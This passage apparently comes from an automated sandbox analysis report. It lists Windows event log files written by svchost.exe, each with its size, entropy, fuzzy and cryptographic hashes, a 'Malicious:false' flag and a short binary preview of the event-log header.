                                                                                                                                SSDEEP:192:PvV7pp8nMLkmp8nPp8njMv+p8nLV7pp8nMLkmp8nPp8njMv+p8n:PvhpiMLxiPijM2iLhpiMLxiPijM2i
                                                                                                                                MD5:1D5F719BE1961F4E1F785DA45503A489
                                                                                                                                SHA1:54E982E975758875D7B3D0A8E3156E7B29334554
                                                                                                                                SHA-256:C27A55A2DE87D103EAA2B3864C12183B39E90D7BEEE46C851660A5C5413037CC
                                                                                                                                SHA-512:86DC8391944B2FB2E682E4D1589A49603885E3D666A3B36601DBA19568C0E0DB2D29394BF5A3AC15F77A5689C806150982029BDDBE46FEFAD6D6849F9756ECE8
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfFile.........................................................................................................................ElfChnk.....................................@.......u.......................................................................=.6............................................=...........................................................................................................................f...............?...................................p...........M...F...............................................f...................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):4.467947111655398
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:xZPZn2bBN2A4VD7VAx8whAGU2woJQghwMvOUFwe8OQhNwRA:
                                                                                                                                MD5:6B473E7917B1EDEE80CAFE7D24A6A4E8
                                                                                                                                SHA1:1940F41550F2986C928648ED00F9C6E4868D1A23
                                                                                                                                SHA-256:1D52F13D2EA4ACC472815240DBFF0F34C6CD5E86F980D04D9AD28E42C3E7A355
                                                                                                                                SHA-512:9AABAD5B7425A9692545864C11B99DDED0051CE8B442FFAB7BAB21DD8CD68B51BC980B01F324A81C685DC56793581AE2E6751DD08497CCBA64FB3339A9B5483D
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.e.......h.......e.......h...............x....;.......................................................................Z}............................................=...............y...........................................................................................................L...............?...............................................M...F...............................................&...................................................................................n...............**......e..........f..........'.z&........'.z..^................A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):4.565838744973026
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:PXY5nVYIyyqED5BVZUe39vHxt1BSocM1:PXY5nVYIyyqED5BVZUe39vHxt1BSot
                                                                                                                                MD5:B30C931B9EF047307E1443502CE7EE14
                                                                                                                                SHA1:BAC3632B709B853DFFCD9C4D65D1F9236F6FE551
                                                                                                                                SHA-256:033CF49641F4E76EFABF8F25753074E7EE72DD567FBA4145D446032D3D9CFADB
                                                                                                                                SHA-512:F5A9CA2D464EBA1F2F4EA426AC3864FB399A8951958BA44BA550E2129C4F4D4DA9E60F0D1B18A07CC76D4BC2CFD20D283F446A47DF990B52916113D5383A1952
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.........~...............~...................F..........................................................................T................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................N...............y.......................**................9..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):17120
                                                                                                                                Entropy (8bit):4.134413581134319
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:PosKFoOoaAxoL+y4omPLoSy+o1oSyrogoSy0oboSyIoroSyOoVoSyBouoSyYozoW:aT
                                                                                                                                MD5:5DE25734332E2AAF2A58135427C13917
                                                                                                                                SHA1:4DB58CAB44EFCEFE0616181A77E8EE8E18A78A63
                                                                                                                                SHA-256:E443BB0D81AB77A313025EB6E6E92230EC4B28C01153D6E931EA18E4E02475B4
                                                                                                                                SHA-512:51E48EEE59A00BFEE19A27F4EA3F65F75B87DE67D81C0D7104D2ACC7BA8114CE9E37E30BAAACEDDA8E1BF9E7B49D191266FB89BE1AC1FAFE797B2667ECC0DF9C
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk......................................+...-....H?......................................................................h.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................................................................ ......U)..............................**..................PN.........Z... ..............................................................>.......V...X.!..e..................PN..0.U.f....4U.f................................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y..k.N.<.D..97d>7.M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.o.d.e.I.n.t.e.g.r.i.t.y./.O.p.e.r.a.t.i.o.n.a.l...!>.U)......!>....[.U.....i...........|...:....A..3...b...%....=.......F.i.l.e.N.a.m.e.L.e.n.g.t.h.......A..3...b...%....=.......F.i.l.e.N
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):0.8511209646626153
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:ChAiPA5PNPxPEPHPhPEPmPSPRP3PoPbPfP0bPnPdP:C2NZ
                                                                                                                                MD5:A98C811B8E1B821CD1FE05A68ADD446A
                                                                                                                                SHA1:4E8B739F5E308F943962E72FF24212FFBE47FAD7
                                                                                                                                SHA-256:58F6584C100174B80ACB8940226841B77884326A293CEE9072F4DD4CF8C10133
                                                                                                                                SHA-512:24A7B9C86A6CE93B9B7F4107A433A247789EE568EB69E301B51DC9D01AA40D2F408AD76B78F7F83E5F4EB47C1677276BC86F86A99BAB95186C2331ABE4CA523C
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk......................................%...&..?........................................................................<.m................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&................................................................................ ..............'.......................**..x.............|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):0.8431535491551847
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:OhZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+lk:OWXSYieD+tvgzmMvRQAsNi
                                                                                                                                MD5:106F006ACA6287586EF71A10A5C06C4D
                                                                                                                                SHA1:B4B6D91FF53E9BDFC8D0D99A0D6F643E49074932
                                                                                                                                SHA-256:79E64A943AED80ADAE43934E4573F95AE7308DDD6FC896EEDDB386C8A41FBA65
                                                                                                                                SHA-512:F4D49C8CBC2B46719521935DFABDC3E05883C2360D4E472920C420B1ACC74D0F835D10A2C5BA6E29038425809D585025172FDC9E534619C017D70FA4D9F23D53
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk......................................$...&..{n.8.....................................................................{..................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................................................................................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):105296
                                                                                                                                Entropy (8bit):3.7685977795252974
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:q2hjhqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqj:qsbCyhLfIIbqbCyhLfIIbl
                                                                                                                                MD5:192A58419A8B1111BFC94BCC037F4E2A
                                                                                                                                SHA1:E94051714D659412671C022475748881EA4B5F85
                                                                                                                                SHA-256:55A1DC4C256A6D2E0D01D4A65398839C8BD74C7D967F23061B2DF49A8FD07358
                                                                                                                                SHA-512:16949970D7DAB1AAA3CAAB207696309388EAE2BFC57F35855A8089D1721457E39EA6B1D99EBF6D5F5A04F7C22401CBDE8804A0324217F833078A8A2B75A04793
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.........K...............K...........H...0............................................................................;..................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n................................................{......................................**......K.........m.PN.........Z...{..............................................................<.......T.....!...................m.PN..0.U.f.....U.f...........K....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.r.y.p.t.o.-.D.P.A.P.I.@.....NF.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.r.y.p.t.o.-.D.P.A.P.I./.O.p.e.r.a.t.i.o.n.a.l....0.............`....GR...N..?....NC.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.M.i.c.r.o.s.o.f.t.\.P.r.o.t.e.c.t.\.S.-.1.-.5.-.1.8.\..............
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):113176
                                                                                                                                Entropy (8bit):3.742611562476744
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:5cMhFBuyKskZljdoKXjtT/r18rQXn8BiJCF9HhrwcMhFBuyKskZljdoKXjtT/r1H:CMhFBuVoMhFBuVZ
                                                                                                                                MD5:0D7BB6AB1D197EEA76CB0C854E685B2B
                                                                                                                                SHA1:4EEC0DBE094F43F0896C2DA462DB7865362C6B14
                                                                                                                                SHA-256:C2D9C106AF23892D9BDDC1373E796D1E2DE8B8BE689454FCC5E976E966B4A57C
                                                                                                                                SHA-512:11F5D34D1A6783D5295248CFD2F6B21B4A28895CDC6EBC4FDCE77D03350D156CB4DAC6ACCC5F7D445C231A1C94D3804A785458C8CC9AEDB49E9D36ECB949141C
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.........M...............M..............8...^..Q....................................................................q...................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A.........................................**..x...........,.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):4.894450290243595
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:EpgjQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZavAFDtCwvhr9Yfr:6HuJ
                                                                                                                                MD5:F57C7ECE707AC802D43AD44BB82544B4
                                                                                                                                SHA1:3CF81EAFDA5B23B1F22F59467877D0B4BE950E00
                                                                                                                                SHA-256:196CEB0EED008598447795DB2E7068EE73DE2FBEE0739F24DDE78C69FE3CD4F7
                                                                                                                                SHA-512:3466151643EB3AFD4A51785E379B5319F3ED0B283C81A4EE913AA21A6AB5D2B469A7F95467EF3AA2FD7DCC777CD9B24C3E9C1B5659DDA94D834033E682D1C350
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.v.......x.......v.......x...........P...`............................................................................p6........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..@...v.......S?;.f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 25, DIRTY
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):92008
                                                                                                                                Entropy (8bit):2.682215662038313
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:g3h1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzB:yMAP1Qa5AgfQQzy4MAP1Qa5AgfQQzy
                                                                                                                                MD5:CEE49B81AB0DB9CDAFF3101A6C3CA6F3
                                                                                                                                SHA1:68BF544E0ADB9E20CC198783C921FF51037CED72
                                                                                                                                SHA-256:C5B208F8AC6C6736B4CCF05F28ED62EF96282FAF263005D428F62BE49F8ACC27
                                                                                                                                SHA-512:C11FD4D3E9787982DE7A9D17050A40125AD6D9CAFC655B9B4EC305FD767354D6F48E66E093B52A7E750359CC08FD8D3C557962FC92A23AA2D62D6FA249B75679
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfFile........................................................................................................................WElfChnk......................................c...f..W.s.......................................................................................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................&.......\......;...............................**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):4.441017411582523
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:BhdERE5EUELEvE/EpEbEmEfEjoPjE4FEqEZEVEiEUhqEd/2EME0EHE+EIy4qEQi0:BQoPjvh7jhHl7lzuzbCN7y+D
                                                                                                                                MD5:8D30244BF7119CFA2F8A7A5AF8FCDAB7
                                                                                                                                SHA1:F0827675265E0DF98A4967D8A539D476551DCAA6
                                                                                                                                SHA-256:489E810931FD45E6D7620FE65EBF1F1A66235B06E572C2C293BD080EE1C8E1ED
                                                                                                                                SHA-512:C71504A8F8D370825FC0C8C605B9F7217EFF2025838ED8FDF3F04CCC41E86751659BB60C7E79C48BBDDC1089C771DD16A193C107DDE4A1487F037BB2FC1455B8
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.q...............q....................i..Pk..buI......................................................................o._................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F........................................7...(..................};...........?..M=.......9..............U*..&....$..........."..............=1......**......q........|.xf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):3.2803522685445374
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:RhYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3Kl0:R1T4hZovIZC7
                                                                                                                                MD5:4A70DB2946C129829BEDDB2E147FBE04
                                                                                                                                SHA1:4D3255FABE0E857840591072D9370047FDDFB83A
                                                                                                                                SHA-256:C10981A84E3884E62907E34159FB7AA2D1F908C3E328D8D8B942B9934DFDE09C
                                                                                                                                SHA-512:7FDBE43D4773CBC17A3879CBC012F8C9FC823529DDF6FE5E10C623B2D7AA89159132F10FE01C0632B6F8F92A0C474C67EF1D5DA4DC2EDC3CA5499D6220922AA4
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.........k...............k...........................................................................................<../................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):2.445920452673848
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:ihFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjDff:izSKEqsMuy6SbKrTPpOIKm
                                                                                                                                MD5:21B26F726BBEBA7FD5C4C45386FC544F
                                                                                                                                SHA1:F6CC3E80D2AD9D2F420C42D7DA3AA3C48C9D956A
                                                                                                                                SHA-256:63E1A62EA280BF1B031E1C98FBF21FF88795119983E5BC96C036B8EEF30D325D
                                                                                                                                SHA-512:A28CB789E4967DB231359AFE7D221C55A57FB56EF899997EBAA0F79EBD92D34547530A64B4B5492400ABFC81631E5ED792D47B836525E5E1583BA6F656062DD5
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.........L...............L......................f....................................................................s.J.................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=........................................f......................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):2.1562721664799103
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:BhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3z2:Bmw9g3LQ
                                                                                                                                MD5:B2C3D7448B237C268D23FE1A78777AA5
                                                                                                                                SHA1:6C3A39325392F2B088C00CDC1763268F15832447
                                                                                                                                SHA-256:05BC150DCBE6B62CE7D2A9CB8F706130DF70BABC54752199B02B4C91ACEE1C4E
                                                                                                                                SHA-512:F9286BC0FC6DB6C52295C0292E2BF732C010F2D542999085F999501AC555C317FB1AFED9A2FF2DF6D91913373D0A32D2307C707381419883F5605F1D67DEE70E
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.........6...............6...........(o...p....Zo....................................................................ZU.#................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#.......................................^^......................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):65536
                                                                                                                                Entropy (8bit):1.9195298486885948
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:384:3hPIRbiY8SIUIi0IsIGIAICI5I2IBIaIKI+I3lKaZrIVlKaZOITTIwI:3LQ9KC8KCV
                                                                                                                                MD5:D4A00CC59E964B7DFD6EFDB643322E9E
                                                                                                                                SHA1:7307AF862B22D743BF6B531829DABE041E9F1F92
                                                                                                                                SHA-256:49414D51861772E0899416FE42628F8641622E9F793F435DE7F0118F45EDE065
                                                                                                                                SHA-512:51663BF2E9D8F1FA3BA6B87918CD36A02AFC2F53FF89F3ED104A4B4129682F0947DC825912A81844E2D25083E7249CE7C1EE8F899D847F511AB20B0404B22F27
                                                                                                                                Malicious:false
                                                                                                                                Preview:ElfChnk.K.......L.......K.......L...........x...86..........................................................................E.U.................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..x...K.......1..f..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

Process:C:\Windows\System32\svchost.exe
File Type:MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 128, DIRTY
Category:dropped
Size (bytes):69080
Entropy (8bit):0.5730314040344844
Encrypted:false
SSDEEP:96:43VNVaO8ioBOPKzUmOPZXAOPoQVNVaO8ioBOPKzUmOPZXAOPo:43fV7cOP4XOPWOPzfV7cOP4XOPWOP
MD5:F0C6298FAC645EFCA1A244C555A4969E
SHA1:AE6ADF0928422749C2AB9C541B7F60A08DC79070
SHA-256:F56C618912B59C1DFEFBBC3209A98A2977905C2FA3193AFE2DA191171CF0F684
SHA-512:82FD4BFBDF355E2E0A4A59ECD01832BCDC9C93BFA24A0F6DE23B2E86F057C07AED91298C52D28E87394EE065E39A954BCB7C2F2F87766733E864DC7F857C9775
Malicious:false
Preview:ElfFile.........................................................................................................................ElfChnk.~...............~...................`...X...K../....................................................................`...................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................................................................&.......................................**..p...~.........Jf..........Z..&........Z.. ..Z...`............A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

Process:C:\Windows\System32\svchost.exe
File Type:MS Windows Vista Event Log, 14 chunks (no. 13 in use), next record no. 418, DIRTY
Category:dropped
Size (bytes):33640
Entropy (8bit):5.68383804089823
Encrypted:false
SSDEEP:384:fPhKa5SzuzNz0zxzuewKWMKFza5rta5ya5e69a5nla5f2KnzyzIzka50bNa5Pa5T:XfSik7DQGAdNC
MD5:06EC64C68B4A523C812A6A96DF001625
SHA1:D9329950DFAAB1D084D2FB7CD02F26EBAD82F936
SHA-256:6D19DC73F87323FB08C91D6810A4F9954E70898EE87666F108F010CA4CF247C6
SHA-512:05895C55059DA616918AB4813143F0524F4ADC3FA01A10C70E05F3BFF46F27C82AD87BCE6EB175F371A3A76D035A1BC165635F994FF543C59231A214327568A5
Malicious:false
Preview:ElfFile......................................................................................................................?I.ElfChnk.............................................(e........................................................................h........................................V...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................V...........................1...{!......**...............O..e.............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):1.119748237037944
Encrypted:false
SSDEEP:384:Sh1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMpRaMRlM7kMGU:SeJB
MD5:D1CFC256BC075DC75D7FD92207C9C0F2
SHA1:587C19CF65305AD470E82AB5A1ED5B2E36472625
SHA-256:6C0365C674BCE55E0C49A62D23782660D34ECB388A8A7418AD9A75DFD36E612E
SHA-512:85F88C26274975D8EB8DDC65297064427A103B557712BD46F459B8E26A1B7E38DA3B4674920FA61476D108BA3B9846430F59AA82926AFEBDCE92B25A527331A3
Malicious:false
Preview:ElfChnk......................................1..p3..\q........................................................................_U........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................................................................,......................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):4.182756017330751
Encrypted:false
SSDEEP:384:9hk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS1B:9BjdjP0csdHkp
MD5:9BA8F6B60705B6A27084436D1D4370AD
SHA1:DCAFEC9C3F76CCE3FF65F8FED6E373B863780B6E
SHA-256:580E71D95D6201104E37944E8A0A6596869D6C8A0CA2CD3B704FEFC9D319C957
SHA-512:BFBAEA71174AEE5233857BFDB4427C59D945A3797EA6F5D02708807321E0ADD12ED632BAA3C5E59141CFEF108FADE90315AB670BB960A281D0E95DB18C4976A4
Malicious:false
